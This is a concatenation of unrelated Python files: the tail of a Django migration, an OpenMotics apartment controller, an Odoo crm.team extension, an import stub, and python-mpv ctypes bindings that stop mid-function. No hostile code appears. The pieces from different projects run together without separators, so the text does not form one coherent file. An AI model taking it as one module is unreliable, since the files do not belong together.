            'Meta': {'object_name': 'UserProject', 'db_table': "u'user_project'"},
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 27, 0, 0)', 'null': 'True', 'blank': 'True'}),
            'created_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'userproject_created_user'", 'to': "orm['auth.User']"}),
            'drive_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'modified_user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'userproject_modified_user'", 'null': 'True', 'to': "orm['auth.User']"}),
            'permission': ('django.db.models.fields.CharField', [], {'default': '0', 'max_length': '255'}),
            'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['projects.Project']", 'db_column': "'project_id'"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        }
    }

    complete_apps = ['projects']
# Copyright (C) 2021 OpenMotics BV
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
"""
apartment controller manages the apartment objects that are known in the system
"""
import logging

from gateway.events import EsafeEvent, EventError
from gateway.exceptions import ItemDoesNotExistException, StateException
from gateway.models import Apartment, Database
from gateway.mappers import ApartmentMapper
from gateway.dto import ApartmentDTO
from gateway.pubsub import PubSub
from ioc import INJECTED, Inject, Injectable, Singleton

if False:  # MyPy
    from typing import List, Optional, Dict, Any
    from esafe.rebus import RebusController

logger = logging.getLogger(__name__)


@Injectable.named('apartment_controller')
@Singleton
class ApartmentController(object):
    def __init__(self):
        self.rebus_controller = None  # type: Optional[RebusController]

    def set_rebus_controller(self, rebus_controller):
        self.rebus_controller = rebus_controller

    @staticmethod
    @Inject
    def send_config_change_event(msg, error=EventError.ErrorTypes.NO_ERROR, pubsub=INJECTED):
        # type: (str, Dict[str, Any], PubSub) -> None
        event = EsafeEvent(EsafeEvent.Types.CONFIG_CHANGE, {'type': 'apartment', 'msg': msg}, error=error)
        pubsub.publish_esafe_event(PubSub.EsafeTopics.CONFIG, event)

    @staticmethod
    def load_apartment(apartment_id):
        # type: (int) -> Optional[ApartmentDTO]
        apartment_orm = Apartment.select().where(Apartment.id == apartment_id).first()
        if apartment_orm is None:
            return None
        apartment_dto = ApartmentMapper.orm_to_dto(apartment_orm)
        return apartment_dto

    @staticmethod
    def load_apartment_by_mailbox_id(mailbox_id):
        # type: (int) -> Optional[ApartmentDTO]
        apartment_orm = Apartment.select().where(Apartment.mailbox_rebus_id == mailbox_id).first()
        if apartment_orm is None:
            return None
        apartment_dto = ApartmentMapper.orm_to_dto(apartment_orm)
        return apartment_dto

    @staticmethod
    def load_apartment_by_doorbell_id(doorbell_id):
        # type: (int) -> Optional[ApartmentDTO]
        apartment_orm = Apartment.select().where(Apartment.doorbell_rebus_id == doorbell_id).first()
        if apartment_orm is None:
            return None
        apartment_dto = ApartmentMapper.orm_to_dto(apartment_orm)
        return apartment_dto

    @staticmethod
    def load_apartments():
        # type: () -> List[ApartmentDTO]
        apartments = []
        for apartment_orm in Apartment.select():
            apartment_dto = ApartmentMapper.orm_to_dto(apartment_orm)
            apartments.append(apartment_dto)
        return apartments

    @staticmethod
    def get_apartment_count():
        # type: () -> int
        return Apartment.select().count()

    @staticmethod
    def apartment_id_exists(apartment_id):
        # type: (int) -> bool
        apartments = ApartmentController.load_apartments()
        ids = (x.id for x in apartments)
        return apartment_id in ids

    def _check_rebus_ids(self, apartment_dto):
        if self.rebus_controller is None:
            raise StateException("Cannot save apartment: Rebus Controller is None")
        if 'doorbell_rebus_id' in apartment_dto.loaded_fields and \
                not self.rebus_controller.verify_device_exists(apartment_dto.doorbell_rebus_id):
            raise ItemDoesNotExistException("Cannot save apartment: doorbell ({}) does not exists".format(apartment_dto.doorbell_rebus_id))
        if 'mailbox_rebus_id' in apartment_dto.loaded_fields and \
                not self.rebus_controller.verify_device_exists(apartment_dto.mailbox_rebus_id):
            raise ItemDoesNotExistException("Cannot save apartment: mailbox ({}) does not exists".format(apartment_dto.mailbox_rebus_id))

    def save_apartment(self, apartment_dto, send_event=True):
        # type: (ApartmentDTO, bool) -> ApartmentDTO
        self._check_rebus_ids(apartment_dto)
        apartment_orm = ApartmentMapper.dto_to_orm(apartment_dto)
        apartment_orm.save()
        if send_event:
            ApartmentController.send_config_change_event('save')
        return ApartmentMapper.orm_to_dto(apartment_orm)

    def save_apartments(self, apartments_dto):
        apartments_dtos = []
        for apartment in apartments_dto:
            apartment_saved = self.save_apartment(apartment, send_event=False)
            apartments_dtos.append(apartment_saved)
        self.send_config_change_event('save')
        return apartments_dtos

    def update_apartment(self, apartment_dto, send_event=True):
        # type: (ApartmentDTO, bool) -> ApartmentDTO
        self._check_rebus_ids(apartment_dto)
        if 'id' not in apartment_dto.loaded_fields or apartment_dto.id is None:
            raise RuntimeError('cannot update an apartment without the id being set')
        try:
            apartment_orm = Apartment.get_by_id(apartment_dto.id)
            loaded_apartment_dto = ApartmentMapper.orm_to_dto(apartment_orm)
            for field in apartment_dto.loaded_fields:
                if field == 'id':
                    continue
                if hasattr(apartment_dto, field):
                    setattr(loaded_apartment_dto, field, getattr(apartment_dto, field))
            apartment_orm = ApartmentMapper.dto_to_orm(loaded_apartment_dto)
            apartment_orm.save()
            if send_event:
                ApartmentController.send_config_change_event('update')
            return ApartmentMapper.orm_to_dto(apartment_orm)
        except Exception as e:
            raise RuntimeError('Could not update the user: {}'.format(e))

    def update_apartments(self, apartment_dtos):
        # type: (List[ApartmentDTO]) -> Optional[List[ApartmentDTO]]
        apartments = []
        with Database.get_db().transaction() as transaction:
            try:
                # First clear all the rebus fields in order to be able to swap 2 fields
                for apartment in apartment_dtos:
                    apartment_orm = Apartment.get_by_id(apartment.id)  # type: Apartment
                    if 'mailbox_rebus_id' in apartment.loaded_fields:
                        apartment_orm.mailbox_rebus_id = None
                    if 'doorbell_rebus_id' in apartment.loaded_fields:
                        apartment_orm.doorbell_rebus_id = None
                    apartment_orm.save()

                # Then check if there is already an apartment with an mailbox or doorbell rebus id that is passed
                # This is needed for when an doorbell or mailbox gets assigned to another apartment. Then the first assignment needs to be deleted.
                for apartment_orm in Apartment.select():
                    for apartment_dto in apartment_dtos:
                        if apartment_orm.mailbox_rebus_id == apartment_dto.mailbox_rebus_id and apartment_orm.mailbox_rebus_id is not None:
                            apartment_orm.mailbox_rebus_id = None
                            apartment_orm.save()
                        if apartment_orm.doorbell_rebus_id == apartment_dto.doorbell_rebus_id and apartment_orm.doorbell_rebus_id is not None:
                            apartment_orm.doorbell_rebus_id = None
                            apartment_orm.save()

                for apartment in apartment_dtos:
                    updated = self.update_apartment(apartment, send_event=False)
                    if updated is not None:
                        apartments.append(updated)
                self.send_config_change_event('update')
            except Exception as ex:
                logger.error('Could not update apartments: {}: {}'.format(type(ex).__name__, ex))
                transaction.rollback()
                return None
        return apartments


    @staticmethod
    def delete_apartment(apartment_dto):
        # type: (ApartmentDTO) -> None
        if "id" in apartment_dto.loaded_fields and apartment_dto.id is not None:
            Apartment.delete_by_id(apartment_dto.id)
        elif "name" in apartment_dto.loaded_fields:
            # First check if there is only one:
            if Apartment.select().where(Apartment.name == apartment_dto.name).count() <= 1:
                Apartment.delete().where(Apartment.name == apartment_dto.name).execute()
                ApartmentController.send_config_change_event('delete')
            else:
                raise RuntimeError('More than one apartment with the given name: {}'.format(apartment_dto.name))
        else:
            raise RuntimeError('Could not find an apartment with the name {} to delete'.format(apartment_dto.name))

from odoo import fields, models


class Job(models.Model):
    _inherit = "crm.team"

    survey_id = fields.Many2one(
        'survey.survey', "Interview Form",
        help="Choose an interview form")

    def action_print_survey(self):
        return self.survey_id.action_print_survey()

##############################################################################
# For copyright and license notices, see __manifest__.py file in module root
# directory
##############################################################################
from . import account_move
from . import account_move_line
from . import account_master_port


from ctypes import *
import ctypes.util
import threading
import os
import sys
from warnings import warn
from functools import partial
import collections
import re
import traceback

# vim: ts=4 sw=4 et

if os.name == 'nt':
    backend = CDLL('mpv-1.dll')
    fs_enc = 'utf-8'
else:
    import locale
    lc, enc = locale.getlocale(locale.LC_NUMERIC)
    # libmpv requires LC_NUMERIC to be set to "C". Since messing with global variables everyone else relies upon is
    # still better than segfaulting, we are setting LC_NUMERIC to "C".
    locale.setlocale(locale.LC_NUMERIC, 'C')

    sofile = ctypes.util.find_library('mpv')
    if sofile is None:
        raise OSError("Cannot find libmpv in the usual places. Depending on your distro, you may try installing an "
                "mpv-devel or mpv-libs package. If you have libmpv around but this script can't find it, maybe consult "
                "the documentation for ctypes.util.find_library which this script uses to look up the library "
                "filename.")
    backend = CDLL(sofile)
    fs_enc = sys.getfilesystemencoding()


class MpvHandle(c_void_p):
    pass

class MpvOpenGLCbContext(c_void_p):
    pass


class PropertyUnavailableError(AttributeError):
    pass

class ErrorCode(object):
    """ For documentation on these, see mpv's libmpv/client.h """
    SUCCESS                 = 0
    EVENT_QUEUE_FULL        = -1
    NOMEM                   = -2
    UNINITIALIZED           = -3
    INVALID_PARAMETER       = -4
    OPTION_NOT_FOUND        = -5
    OPTION_FORMAT           = -6
    OPTION_ERROR            = -7
    PROPERTY_NOT_FOUND      = -8
    PROPERTY_FORMAT         = -9
    PROPERTY_UNAVAILABLE    = -10
    PROPERTY_ERROR          = -11
    COMMAND                 = -12

    EXCEPTION_DICT = {
             0:     None,
            -1:     lambda *a: MemoryError('mpv event queue full', *a),
            -2:     lambda *a: MemoryError('mpv cannot allocate memory', *a),
            -3:     lambda *a: ValueError('Uninitialized mpv handle used', *a),
            -4:     lambda *a: ValueError('Invalid value for mpv parameter', *a),
            -5:     lambda *a: AttributeError('mpv option does not exist', *a),
            -6:     lambda *a: TypeError('Tried to set mpv option using wrong format', *a),
            -7:     lambda *a: ValueError('Invalid value for mpv option', *a),
            -8:     lambda *a: AttributeError('mpv property does not exist', *a),
            # Currently (mpv 0.18.1) there is a bug causing a PROPERTY_FORMAT error to be returned instead of
            # INVALID_PARAMETER when setting a property-mapped option to an invalid value.
            -9:     lambda *a: TypeError('Tried to get/set mpv property using wrong format, or passed invalid value', *a),
            -10:    lambda *a: PropertyUnavailableError('mpv property is not available', *a),
            -11:    lambda *a: RuntimeError('Generic error getting or setting mpv property', *a),
            -12:    lambda *a: SystemError('Error running mpv command', *a) }

    @staticmethod
    def default_error_handler(ec, *args):
        return ValueError(_mpv_error_string(ec).decode('utf-8'), ec, *args)

    @classmethod
    def raise_for_ec(kls, ec, func, *args):
        ec = 0 if ec > 0 else ec
        ex = kls.EXCEPTION_DICT.get(ec , kls.default_error_handler)
        if ex:
            raise ex(ec, *args)


class MpvFormat(c_int):
    NONE        = 0
    STRING      = 1
    OSD_STRING  = 2
    FLAG        = 3
    INT64       = 4
    DOUBLE      = 5
    NODE        = 6
    NODE_ARRAY  = 7
    NODE_MAP    = 8
    BYTE_ARRAY  = 9

    def __eq__(self, other):
        return self is other or self.value == other or self.value == int(other)

    def __repr__(self):
        return ['NONE', 'STRING', 'OSD_STRING', 'FLAG', 'INT64', 'DOUBLE', 'NODE', 'NODE_ARRAY', 'NODE_MAP',
                'BYTE_ARRAY'][self.value]



class MpvEventID(c_int):
    NONE                    = 0
    SHUTDOWN                = 1
    LOG_MESSAGE             = 2
    GET_PROPERTY_REPLY      = 3
    SET_PROPERTY_REPLY      = 4
    COMMAND_REPLY           = 5
    START_FILE              = 6
    END_FILE                = 7
    FILE_LOADED             = 8
    TRACKS_CHANGED          = 9
    TRACK_SWITCHED          = 10
    IDLE                    = 11
    PAUSE                   = 12
    UNPAUSE                 = 13
    TICK                    = 14
    SCRIPT_INPUT_DISPATCH   = 15
    CLIENT_MESSAGE          = 16
    VIDEO_RECONFIG          = 17
    AUDIO_RECONFIG          = 18
    METADATA_UPDATE         = 19
    SEEK                    = 20
    PLAYBACK_RESTART        = 21
    PROPERTY_CHANGE         = 22
    CHAPTER_CHANGE          = 23

    ANY = ( SHUTDOWN, LOG_MESSAGE, GET_PROPERTY_REPLY, SET_PROPERTY_REPLY, COMMAND_REPLY, START_FILE, END_FILE,
            FILE_LOADED, TRACKS_CHANGED, TRACK_SWITCHED, IDLE, PAUSE, UNPAUSE, TICK, SCRIPT_INPUT_DISPATCH,
            CLIENT_MESSAGE, VIDEO_RECONFIG, AUDIO_RECONFIG, METADATA_UPDATE, SEEK, PLAYBACK_RESTART, PROPERTY_CHANGE,
            CHAPTER_CHANGE )

    def __repr__(self):
        return ['NONE', 'SHUTDOWN', 'LOG_MESSAGE', 'GET_PROPERTY_REPLY', 'SET_PROPERTY_REPLY', 'COMMAND_REPLY',
                'START_FILE', 'END_FILE', 'FILE_LOADED', 'TRACKS_CHANGED', 'TRACK_SWITCHED', 'IDLE', 'PAUSE', 'UNPAUSE',
                'TICK', 'SCRIPT_INPUT_DISPATCH', 'CLIENT_MESSAGE', 'VIDEO_RECONFIG', 'AUDIO_RECONFIG',
                'METADATA_UPDATE', 'SEEK', 'PLAYBACK_RESTART', 'PROPERTY_CHANGE', 'CHAPTER_CHANGE'][self.value]


class MpvNodeList(Structure):
    def array_value(self, decode_str=False):
        return [ self.values[i].node_value(decode_str) for i in range(self.num) ]

    def dict_value(self, decode_str=False):
        return { self.keys[i].decode('utf-8'): self.values[i].node_value(decode_str) for i in range(self.num) }

class MpvNode(Structure):
    _fields_ = [('val', c_longlong),
                ('format', MpvFormat)]

    def node_value(self, decode_str=False):
        return MpvNode.node_cast_value(byref(c_void_p(self.val)), self.format.value, decode_str)

    @staticmethod
    def node_cast_value(v, fmt, decode_str=False):
        dwrap = lambda s: s.decode('utf-8') if decode_str else s
        return {
            MpvFormat.NONE:         lambda v: None,
            MpvFormat.STRING:       lambda v: dwrap(cast(v, POINTER(c_char_p)).contents.value),
            MpvFormat.OSD_STRING:   lambda v: cast(v, POINTER(c_char_p)).contents.value.decode('utf-8'),
            MpvFormat.FLAG:         lambda v: bool(cast(v, POINTER(c_int)).contents.value),
            MpvFormat.INT64:        lambda v: cast(v, POINTER(c_longlong)).contents.value,
            MpvFormat.DOUBLE:       lambda v: cast(v, POINTER(c_double)).contents.value,
            MpvFormat.NODE:         lambda v: cast(v, POINTER(MpvNode)).contents.node_value(decode_str),
            MpvFormat.NODE_ARRAY:   lambda v: cast(v, POINTER(POINTER(MpvNodeList))).contents.contents.array_value(decode_str),
            MpvFormat.NODE_MAP:     lambda v: cast(v, POINTER(POINTER(MpvNodeList))).contents.contents.dict_value(decode_str),
            MpvFormat.BYTE_ARRAY:   lambda v: cast(v, POINTER(c_char_p)).contents.value,
            }[fmt](v)

MpvNodeList._fields_ = [('num', c_int),
                        ('values', POINTER(MpvNode)),
                        ('keys', POINTER(c_char_p))]

class MpvSubApi(c_int):
    MPV_SUB_API_OPENGL_CB   = 1

class MpvEvent(Structure):
    _fields_ = [('event_id', MpvEventID),
                ('error', c_int),
                ('reply_userdata', c_ulonglong),
                ('data', c_void_p)]

    def as_dict(self):
        dtype = {MpvEventID.END_FILE:               MpvEventEndFile,
                MpvEventID.PROPERTY_CHANGE:         MpvEventProperty,
                MpvEventID.GET_PROPERTY_REPLY:      MpvEventProperty,
                MpvEventID.LOG_MESSAGE:             MpvEventLogMessage,
                MpvEventID.SCRIPT_INPUT_DISPATCH:   MpvEventScriptInputDispatch,
                MpvEventID.CLIENT_MESSAGE:          MpvEventClientMessage
            }.get(self.event_id.value, None)
        return {'event_id': self.event_id.value,
                'error': self.error,
                'reply_userdata': self.reply_userdata,
                'event': cast(self.data, POINTER(dtype)).contents.as_dict() if dtype else None}

class MpvEventProperty(Structure):
    _fields_ = [('name', c_char_p),
                ('format', MpvFormat),
                ('data', c_void_p)]
    def as_dict(self):
        if self.format.value == MpvFormat.STRING:
            proptype, _access = ALL_PROPERTIES.get(self.name, (str, None))
            return {'name': self.name.decode('utf-8'),
                    'format': self.format,
                    'data': self.data,
                    'value': proptype(cast(self.data, POINTER(c_char_p)).contents.value.decode('utf-8'))}
        else:
            return {'name': self.name.decode('utf-8'),
                    'format': self.format,
                    'data': self.data}

class MpvEventLogMessage(Structure):
    _fields_ = [('prefix', c_char_p),
                ('level', c_char_p),
                ('text', c_char_p)]

    def as_dict(self):
        return { 'prefix': self.prefix.decode('utf-8'),
                 'level':  self.level.decode('utf-8'),
                 'text':   self.text.decode('utf-8').rstrip() }

class MpvEventEndFile(c_int):
    EOF_OR_INIT_FAILURE = 0
    RESTARTED           = 1
    ABORTED             = 2
    QUIT                = 3

    def as_dict(self):
        return {'reason': self.value}

class MpvEventScriptInputDispatch(Structure):
    _fields_ = [('arg0', c_int),
                ('type', c_char_p)]

    def as_dict(self):
        pass # TODO

class MpvEventClientMessage(Structure):
    _fields_ = [('num_args', c_int),
                ('args', POINTER(c_char_p))]

    def as_dict(self):
        return { 'args': [ self.args[i].decode('utf-8') for i in range(self.num_args) ] }

WakeupCallback = CFUNCTYPE(None, c_void_p)

OpenGlCbUpdateFn = CFUNCTYPE(None, c_void_p)
OpenGlCbGetProcAddrFn = CFUNCTYPE(None, c_void_p, c_char_p)

def _handle_func(name, args, restype, errcheck, ctx=MpvHandle):
    func = getattr(backend, name)
    func.argtypes = [ctx] + args if ctx else args
    if restype is not None:
        func.restype = restype
    if errcheck is not None:
        func.errcheck = errcheck
    globals()['_'+name] = func

def bytes_free_errcheck(res, func, *args):
    notnull_errcheck(res, func, *args)
    rv = cast(res, c_void_p).value
    _mpv_free(res)
    return rv

def notnull_errcheck(res, func, *args):
    if res is None:
        raise RuntimeError('Underspecified error in MPV when calling {} with args {!r}: NULL pointer returned.'\
                'Please consult your local debugger.'.format(func.__name__, args))
    return res

ec_errcheck = ErrorCode.raise_for_ec

def _handle_gl_func(name, args=[], restype=None):
    _handle_func(name, args, restype, errcheck=None, ctx=MpvOpenGLCbContext)

backend.mpv_client_api_version.restype = c_ulong
def _mpv_client_api_version():
    ver = backend.mpv_client_api_version()
    return ver>>16, ver&0xFFFF

backend.mpv_free.argtypes = [c_void_p]
_mpv_free = backend.mpv_free

backend.mpv_free_node_contents.argtypes = [c_void_p]
_mpv_free_node_contents = backend.mpv_free_node_contents

backend.mpv_create.restype = MpvHandle
_mpv_create = backend.mpv_create

_handle_func('mpv_create_client',           [c_char_p],                                 MpvHandle, notnull_errcheck)
_handle_func('mpv_client_name',             [],                                         c_char_p, errcheck=None)
_handle_func('mpv_initialize',              [],                                         c_int, ec_errcheck)
_handle_func('mpv_detach_destroy',          [],                                         None, errcheck=None)
_handle_func('mpv_terminate_destroy',       [],                                         None, errcheck=None)
_handle_func('mpv_load_config_file',        [c_char_p],                                 c_int, ec_errcheck)
_handle_func('mpv_suspend',                 [],                                         None, errcheck=None)
_handle_func('mpv_resume',                  [],                                         None, errcheck=None)
_handle_func('mpv_get_time_us',             [],                                         c_ulonglong, errcheck=None)

_handle_func('mpv_set_option',              [c_char_p, MpvFormat, c_void_p],            c_int, ec_errcheck)
_handle_func('mpv_set_option_string',       [c_char_p, c_char_p],                       c_int, ec_errcheck)

_handle_func('mpv_command',                 [POINTER(c_char_p)],                        c_int, ec_errcheck)
_handle_func('mpv_command_string',          [c_char_p, c_char_p],                       c_int, ec_errcheck)
_handle_func('mpv_command_async',           [c_ulonglong, POINTER(c_char_p)],           c_int, ec_errcheck)

_handle_func('mpv_set_property',            [c_char_p, MpvFormat, c_void_p],            c_int, ec_errcheck)
_handle_func('mpv_set_property_string',     [c_char_p, c_char_p],                       c_int, ec_errcheck)
_handle_func('mpv_set_property_async',      [c_ulonglong, c_char_p, MpvFormat,c_void_p],c_int, ec_errcheck)
_handle_func('mpv_get_property',            [c_char_p, MpvFormat, c_void_p],            c_int, ec_errcheck)
_handle_func('mpv_get_property_string',     [c_char_p],                                 c_void_p, bytes_free_errcheck)
_handle_func('mpv_get_property_osd_string', [c_char_p],                                 c_void_p, bytes_free_errcheck)
_handle_func('mpv_get_property_async',      [c_ulonglong, c_char_p, MpvFormat],         c_int, ec_errcheck)
_handle_func('mpv_observe_property',        [c_ulonglong, c_char_p, MpvFormat],         c_int, ec_errcheck)
_handle_func('mpv_unobserve_property',      [c_ulonglong],                              c_int, ec_errcheck)

_handle_func('mpv_event_name',              [c_int],                                    c_char_p, errcheck=None, ctx=None)
_handle_func('mpv_error_string',            [c_int],                                    c_char_p, errcheck=None, ctx=None)

_handle_func('mpv_request_event',           [MpvEventID, c_int],                        c_int, ec_errcheck)
_handle_func('mpv_request_log_messages',    [c_char_p],                                 c_int, ec_errcheck)
_handle_func('mpv_wait_event',              [c_double],                                 POINTER(MpvEvent), errcheck=None)
_handle_func('mpv_wakeup',                  [],                                         None, errcheck=None)
_handle_func('mpv_set_wakeup_callback',     [WakeupCallback, c_void_p],                 None, errcheck=None)
_handle_func('mpv_get_wakeup_pipe',         [],                                         c_int, errcheck=None)

_handle_func('mpv_get_sub_api',             [MpvSubApi],                                c_void_p, notnull_errcheck)

_handle_gl_func('mpv_opengl_cb_set_update_callback',    [OpenGlCbUpdateFn, c_void_p])
_handle_gl_func('mpv_opengl_cb_init_gl',                [c_char_p, OpenGlCbGetProcAddrFn, c_void_p],    c_int)
_handle_gl_func('mpv_opengl_cb_draw',                   [c_int, c_int, c_int],                          c_int)
_handle_gl_func('mpv_opengl_cb_render',                 [c_int, c_int],                                 c_int)
_handle_gl_func('mpv_opengl_cb_report_flip',            [c_ulonglong],                                  c_int)
_handle_gl_func('mpv_opengl_cb_uninit_gl',              [],                                             c_int)


def _ensure_encoding(possibly_bytes):
    return possibly_bytes.decode('utf-8') if type(possibly_bytes) is bytes else possibly_bytes


def _event_generator(handle):
    while True:
        event = _mpv_wait_event(handle, -1).contents
        if event.event_id.value == MpvEventID.NONE:
            raise StopIteration()
        yield event

def load_lua():
    """ Use this function if you intend to use mpv's built-in lua interpreter. This is e.g. needed for playback of
    youtube urls. """
    CDLL('liblua.so', mode=RTLD_GLOBAL)


def _event_loop(event_handle, playback_cond, event_callbacks, message_handlers, property_handlers, log_handler):
    for event in _event_generator(event_handle):
        try:
            devent = event.as_dict() # copy data from ctypes
            eid = devent['event_id']
            for callback in event_callbacks:
                callback(devent)
            if eid in (MpvEventID.SHUTDOWN, MpvEventID.END_FILE):
                with playback_cond:
                    playback_cond.notify_all()
            if eid == MpvEventID.PROPERTY_CHANGE:
                pc = devent['event']
                name = pc['name']

                if 'value' in pc:
                    proptype, _access = ALL_PROPERTIES[name]
                    if proptype is bytes:
                        args = (pc['value'],)
                    else:
                        args = (proptype(_ensure_encoding(pc['value'])),)
                elif pc['format'] == MpvFormat.NONE:
                    args = (None,)
                else:
                    args = (pc['data'], pc['format'])

                for handler in property_handlers[name]:
                    handler(*args)
            if eid == MpvEventID.LOG_MESSAGE and log_handler is not None:
                ev = devent['event']
                log_handler(ev['level'], ev['prefix'], ev['text'])
            if eid == MpvEventID.CLIENT_MESSAGE:
                # {'event': {'args': ['key-binding', 'foo', 'u-', 'g']}, 'reply_userdata': 0, 'error': 0, 'event_id': 16}
                target, *args = devent['event']['args']
                if target in message_handlers:
                    message_handlers[target](*args)
            if eid == MpvEventID.SHUTDOWN:
                _mpv_detach_destroy(event_handle)
                return
        except Exception as e:
            traceback.print_exc()

class MPV(object):
    """ See man mpv(1) for the details of the implemented commands. """
    def __init__(self, *extra_mpv_flags, log_handler=None, start_event_thread=True, **extra_mpv_opts):
        """ Create an MPV instance.

        Extra arguments and extra keyword arguments will be passed to mpv as options. """

        self._event_thread = None
        self.handle = _mpv_create()

        _mpv_set_option_string(self.handle, b'audio-display', b'no')
        istr = lambda o: ('yes' if o else 'no') if type(o) is bool else str(o)
        try:
            for flag in extra_mpv_flags:
                _mpv_set_option_string(self.handle, flag.encode('utf-8'), b'')
            for k,v in extra_mpv_opts.items():
                _mpv_set_option_string(self.handle, k.replace('_', '-').encode('utf-8'), istr(v).encode('utf-8'))
        except AttributeError as e:
            _mpv_initialize(self.handle)
            raise e
        _mpv_initialize(self.handle)

        self._event_callbacks = []
        self._property_handlers = collections.defaultdict(lambda: [])
        self._message_handlers = {}
        self._key_binding_handlers = {}
        self._playback_cond = threading.Condition()
        self._event_handle = _mpv_create_client(self.handle, b'py_event_handler')
        self._loop = partial(_event_loop, self._event_handle, self._playback_cond, self._event_callbacks,
                self._message_handlers, self._property_handlers, log_handler)
        if start_event_thread:
            self._event_thread = threading.Thread(target=self._loop, name='MPVEventHandlerThread')
            self._event_thread.setDaemon(True)
            self._event_thread.start()
        else:
            self._event_thread = None

        if log_handler is not None:
            self.set_loglevel('terminal-default')

    def wait_for_playback(self):
        """ Waits until playback of the current title is paused or done """
        with self._playback_cond:
            self._playback_cond.wait()

    def wait_for_property(self, name, cond=lambda val: val, level_sensitive=True):
        sema = threading.Semaphore(value=0)
        def observer(val):
            if cond(val):
                sema.release()
        self.observe_property(name, observer)
        if not level_sensitive or not cond(getattr(self, name.replace('-', '_'))):
            sema.acquire()
        self.unobserve_property(name, observer)

    def __del__(self):
        if self.handle:
            self.terminate()

    def terminate(self):
        self.handle, handle = None, self.handle
        if threading.current_thread() is self._event_thread:
            # Handle special case to allow event handle to be detached.
            # This is necessary since otherwise the event thread would deadlock itself.
            grim_reaper = threading.Thread(target=lambda: _mpv_terminate_destroy(handle))
            grim_reaper.start()
        else:
            _mpv_terminate_destroy(handle)
            if self._event_thread:
                self._event_thread.join()

    def set_loglevel(self, level):
        _mpv_request_log_messages(self._event_handle, level.encode('utf-8'))

    def command(self, name, *args):
        """ Execute a raw command """
        args = [name.encode('utf-8')] + [ (arg if type(arg) is bytes else str(arg).encode('utf-8'))
                for arg in args if arg is not None ] + [None]
        _mpv_command(self.handle, (c_char_p*len(args))(*args))

    def seek(self, amount, reference="relative", precision="default-precise"):
        self.command('seek', amount, reference, precision)

    def revert_seek(self):
        self.command('revert_seek');

    def frame_step(self):
        self.command('frame_step')

    def frame_back_step(self):
        self.command('frame_back_step')

    def _add_property(self, name, value=None):
        self.command('add_property', name, value)

    def _cycle_property(self, name, direction='up'):
        self.command('cycle_property', name, direction)

    def _multiply_property(self, name, factor):
        self.command('multiply_property', name, factor)

    def screenshot(self, includes='subtitles', mode='single'):
        self.command('screenshot', includes, mode)

    def screenshot_to_file(self, filename, includes='subtitles'):
        self.command('screenshot_to_file', filename.encode(fs_enc), includes)

    def playlist_next(self, mode='weak'):
        self.command('playlist_next', mode)

    def playlist_prev(self, mode='weak'):
        self.command('playlist_prev', mode)

    @staticmethod
    def _encode_options(options):
        return ','.join('{}={}'.format(str(key), str(val)) for key, val in options.items())

    def loadfile(self, filename, mode='replace', **options):
        self.command('loadfile', filename.encode(fs_enc), mode, MPV._encode_options(options))

    def loadlist(self, playlist, mode='replace'):
        self.command('loadlist', playlist.encode(fs_enc), mode)

    def playlist_clear(self):
        self.command('playlist_clear')

    def playlist_remove(self, index='current'):
        self.command('playlist_remove', index)

    def playlist_move(self, index1, index2):
        self.command('playlist_move', index1, index2)

    def run(self, command, *args):
        self.command('run', command, *args)

    def quit(self, code=None):
        self.command('quit', code)

    def quit_watch_later(self, code=None):
        self.command('quit_watch_later', code)

    def sub_add(self, filename):
        self.command('sub_add', filename.encode(fs_enc))

    def sub_remove(self, sub_id=None):
        self.command('sub_remove', sub_id)

    def sub_reload(self, sub_id=None):
        self.command('sub_reload', sub_id)

    def sub_step(self, skip):
        self.command('sub_step', skip)

    def sub_seek(self, skip):
        self.command('sub_seek', skip)

    def toggle_osd(self):
        self.command('osd')

    def show_text(self, string, duration='-', level=None):
        self.command('show_text', string, duration, level)

    def show_progress(self):
        self.command('show_progress')

    def discnav(self, command):
        self.command('discnav', command)

    def write_watch_later_config(self):
        self.command('write_watch_later_config')

    def overlay_add(self, overlay_id, x, y, file_or_fd, offset, fmt, w, h, stride):
        self.command('overlay_add', overlay_id, x, y, file_or_fd, offset, fmt, w, h, stride)

    def overlay_remove(self, overlay_id):
        self.command('overlay_remove', overlay_id)

    def script_message(self, *args):
        self.command('script_message', *args)

    def script_message_to(self, target, *args):
        self.command('script_message_to', target, *args)

    def observe_property(self, name, handler):
        self._property_handlers[name].append(handler)
        _mpv_observe_property(self._event_handle, hash(name)&0xffffffffffffffff, name.encode('utf-8'), MpvFormat.STRING)

    def unobserve_property(self, name, handler):
        handlers = self._property_handlers[name]
        handlers.remove(handler)
        if not handlers:
            _mpv_unobserve_property(self._event_handle, hash(name)&0xffffffffffffffff)

    def register_message_handler(self, target, handler):
        self._message_handlers[target] = handler

    def unregister_message_handler(self, target):
        del self._message_handlers[target]

    def register_event_callback(self, callback):
        self._event_callbacks.append(callback)

    def unregister_event_callback(self, callback):
        self._event_callbacks.remove(callback)

    @staticmethod
    def _binding_name(callback_or_cmd):
        return 'py_kb_{:016x}'.format(hash(callback_or_cmd)&0xffffffffffffffff)

    def register_key_binding(self, keydef, callback_or_cmd, mode='force'):
        """ BIG FAT WARNING: mpv's key binding mechanism is pretty powerful. This means, you essentially get arbitrary
        code exectution through key bindings. This interface makes some limited effort to sanitize the keydef given in
        the first parameter, but YOU SHOULD NOT RELY ON THIS IN FOR SECURITY. If your input comes from config files,
        this is completely fine--but, if you are about to pass untrusted input into this parameter, better double-check
        whether this is secure in your case. """
        if not re.match(r'(Shift+)?(Ctrl+)?(Alt+)?(Meta+)?(.|\w+)', keydef):
